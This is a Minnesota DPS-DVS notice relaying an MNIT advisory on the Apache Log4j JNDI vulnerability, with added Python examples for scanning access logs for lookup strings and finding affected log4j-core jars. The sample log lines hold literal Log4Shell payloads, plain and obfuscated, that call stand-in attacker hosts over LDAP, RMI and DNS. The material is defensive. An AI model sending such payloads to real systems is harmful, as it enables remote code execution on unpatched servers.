Be informed – Apache Log4j security vulnerability
This message is being sent to all deputy registrar offices and driver’s license agent offices on behalf of DPS-DVS.
On December 12, Minnesota IT Services (MNIT) issued a notice to local government partners about the Apache Log4j security vulnerability. Please see the information from MNIT below:
Situational Awareness – Critical Vulnerability: Apache Log4j
A critical vulnerability has been discovered in Apache Log4j, a widely used logging library for Java. The vulnerability resides in the JNDI lookup feature of the Log4j library: if an attacker-supplied string that contains a JNDI lookup is logged, the library resolves that lookup, which can include contacting a server the attacker controls. Successful exploitation could allow arbitrary code execution in the context of any system, service or application that uses the library.
Systems Affected:
- Apache Log4j versions 2.0 through 2.15.0, inclusive.
Impact:
- According to numerous open-source reports, Log4j is used by Apache products such as Struts, Solr and Druid, as well as by many other technologies. Products and services of many vendors have been found to be affected, including Apple, Twitter, Steam, Tesla, Minecraft and more.
- Threat actors can deliver the payload over ordinary HTTP requests, for example in a User-Agent header or in plain POST form data, because any attacker-supplied value that the application logs is enough to trigger the lookup. Organizations are already reporting exploitation in the wild, and further attempts against other websites are likely.
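Because the payload arrives in fields that web servers already write to their access logs, an access-log scan is a practical first check. The following is an added example, not part of the MNIT or DPS notice: it looks for the `${jndi:...}` lookup string in whole log lines (request path, referer and User-Agent all land there), after undoing URL encoding and the common obfuscations that wrap single characters in nested lookups such as `${lower:j}` or `${::-n}`. The log lines, hostnames and addresses are constructed for the example (reserved documentation ranges and the `.invalid` TLD); the function and variable names are the example's own.

```python
"""
Added example, not part of the MNIT/DPS notice: scan web-server access-log
lines for Log4j JNDI lookup strings, including URL-encoded and obfuscated
variants. Sample log lines below are constructed.
"""
import re
from urllib.parse import unquote

# One nested lookup that resolves to a single character, e.g. ${lower:j},
# ${::-n}, ${env:NOPE:-d}. Collapsing these repeatedly rewrites
# ${${lower:j}${::-n}di:ldap://...} back into ${jndi:ldap://...}.
_NESTED_CHAR = re.compile(r"\$\{(?:[a-z]*:[^{}$]*?:-|[a-z]+:)([^{}$])\}")

# The canonical lookup once de-obfuscated: capture the scheme and host[:port].
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:/*([^/}\s]*)")


def normalize(text):
    """Lower-case, URL-decode (twice, for double encoding), collapse nested lookups."""
    t = unquote(unquote(text)).lower()
    while True:
        collapsed = _NESTED_CHAR.sub(lambda m: m.group(1), t)
        if collapsed == t:
            return t
        t = collapsed


def find_jndi(text):
    """Return {'scheme', 'host'} for the first JNDI lookup in text, else None."""
    m = _JNDI.search(normalize(text))
    return {"scheme": m.group(1), "host": m.group(2)} if m else None


def scan_log(lines):
    """Scan whole access-log lines; returns one hit per line with a lookup."""
    hits = []
    for n, line in enumerate(lines, start=1):
        found = find_jndi(line)
        if found:
            hits.append({"line": n, **found})
    return hits


# Constructed sample in combined log format: one benign request, a lookup in
# the User-Agent, an obfuscated lookup in the query string, and a URL-encoded
# lookup in the User-Agent.
LOG_LINES = [
    '10.0.0.5 - - [11/Dec/2021:03:14:07 +0000] "GET /index.html HTTP/1.1" 200 612 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [11/Dec/2021:03:14:09 +0000] "GET / HTTP/1.1" 200 612 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - [11/Dec/2021:03:14:11 +0000] "GET /?x=${${lower:j}${::-n}di:rmi://198.51.100.7:1099/b} HTTP/1.1" 400 0 "-" "curl/7.68.0"',
    '10.0.0.9 - - [11/Dec/2021:03:14:12 +0000] "POST /login HTTP/1.1" 302 0 "-" "%24%7Bjndi%3Adns%3A%2F%2Fexample.invalid%2Fc%7D"',
]

if __name__ == "__main__":
    for hit in scan_log(LOG_LINES):
        print(f"line {hit['line']}: JNDI lookup via {hit['scheme']} to {hit['host']}")
```

The scheme and host in each hit are what you would pivot on next: the host is the attacker's callback server, and outbound connections from the web tier to it (LDAP on 1389, RMI on 1099, or DNS queries for it) are the sign that a lookup was actually resolved rather than merely logged. Payloads in a POST body are not in the access log at all, so the same `find_jndi` check should also be applied to application logs or a request-capturing proxy where the body is visible.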
Recommendations:
- If you have not yet done so, reach out to your IT support teams for assistance addressing this vulnerability.
- The Apache Software Foundation has released a security advisory and Log4j version 2.16.0 to address this critical vulnerability. Upgrade Log4j to version 2.16.0 as soon as possible.
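Upgrading first requires knowing where Log4j is installed, and the library is often not a top-level file: it is frequently bundled inside application jars and wars. The following is an added example, not code from MNIT, DPS or the Apache project: it walks a directory tree, identifies log4j-core jars by the presence of the JNDI lookup class, reads the version from each jar's manifest, descends into nested jars, and flags versions in the range the notice lists (2.0 through 2.15.0). The jars it scans are constructed stand-ins written to a temporary directory so the example runs offline; the `demo` helper and its file names are the example's own.

```python
"""
Added example, not from the MNIT/DPS notice or the Apache project: locate
log4j-core jars on disk (including jars nested inside other jars/wars) and
flag the versions the notice lists as affected. The jars in demo() are
constructed stand-ins, not real Log4j artifacts.
"""
import io
import os
import re
import tempfile
import zipfile

AFFECTED_MIN = (2, 0, 0)
AFFECTED_MAX = (2, 15, 0)   # range stated in the notice; 2.16.0 is the fix
# This class exists only in log4j-core, so its presence identifies the jar.
JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"


def parse_version(text):
    """'2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0, 0). Non-numeric parts count as 0."""
    nums = []
    for part in text.strip().split("."):
        m = re.match(r"\d+", part)
        nums.append(int(m.group()) if m else 0)
    return tuple((nums + [0, 0, 0])[:3])


def is_affected(version):
    return AFFECTED_MIN <= version <= AFFECTED_MAX


def manifest_version(zf):
    """Implementation-Version from META-INF/MANIFEST.MF as a tuple, or None."""
    try:
        manifest = zf.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
    except KeyError:
        return None
    for line in manifest.splitlines():
        if line.startswith("Implementation-Version:"):
            return parse_version(line.split(":", 1)[1])
    return None


def inspect_archive(name, data):
    """Report log4j-core found in one archive (bytes), recursing into nested jars/wars."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = set(zf.namelist())
        if JNDI_LOOKUP in names:
            version = manifest_version(zf)
            findings.append({
                "archive": name,
                "version": version,
                # None when the manifest carries no version: inspect by hand.
                "affected": None if version is None else is_affected(version),
            })
        for entry in names:
            if entry.endswith((".jar", ".war")):
                findings.extend(inspect_archive(f"{name}!{entry}", zf.read(entry)))
    return findings


def scan_tree(root):
    """Walk root and inspect every jar/war/ear found."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if fn.endswith((".jar", ".war", ".ear")):
                path = os.path.join(dirpath, fn)
                with open(path, "rb") as fh:
                    findings.extend(inspect_archive(path, fh.read()))
    return findings


def build_fake_jar(version, with_jndi=True):
    """Constructed stand-in for a jar: a manifest plus (optionally) an empty JndiLookup entry."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF",
                    f"Manifest-Version: 1.0\r\nImplementation-Version: {version}\r\n")
        if with_jndi:
            zf.writestr(JNDI_LOOKUP, b"")
    return buf.getvalue()


def demo():
    """Write constructed jars under a temp dir, scan it, return {archive: affected}."""
    with tempfile.TemporaryDirectory() as root:
        lib = os.path.join(root, "app", "WEB-INF", "lib")
        os.makedirs(lib)
        with open(os.path.join(lib, "log4j-core-2.14.1.jar"), "wb") as fh:
            fh.write(build_fake_jar("2.14.1"))          # affected
        with open(os.path.join(root, "log4j-core-2.16.0.jar"), "wb") as fh:
            fh.write(build_fake_jar("2.16.0"))          # fixed release
        with open(os.path.join(root, "log4j-api-2.14.1.jar"), "wb") as fh:
            fh.write(build_fake_jar("2.14.1", with_jndi=False))  # not log4j-core
        fat = io.BytesIO()                               # fat jar bundling an old core
        with zipfile.ZipFile(fat, "w") as zf:
            zf.writestr("lib/log4j-core-2.11.2.jar", build_fake_jar("2.11.2"))
        with open(os.path.join(root, "service.jar"), "wb") as fh:
            fh.write(fat.getvalue())
        return {f["archive"].replace(root + os.sep, ""): f["affected"]
                for f in scan_tree(root)}


if __name__ == "__main__":
    for archive, affected in demo().items():
        print(f"{archive}: {'AFFECTED' if affected else 'ok' if affected is False else 'unknown'}")
```

Point `scan_tree` at application, container and vendor-software directories rather than only the obvious `lib/` folders; the nested-jar case (`service.jar!lib/log4j-core-2.11.2.jar` in the demo) is exactly the one a file-name search for `log4j-core-*.jar` misses. A jar whose version cannot be read reports `None` and should be checked by hand rather than assumed safe.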
Additional resources for more information:
The Common Vulnerabilities and Exposures system
Apache Log4j Vulnerability Guidance | CISA
Apache Advisory: Log4j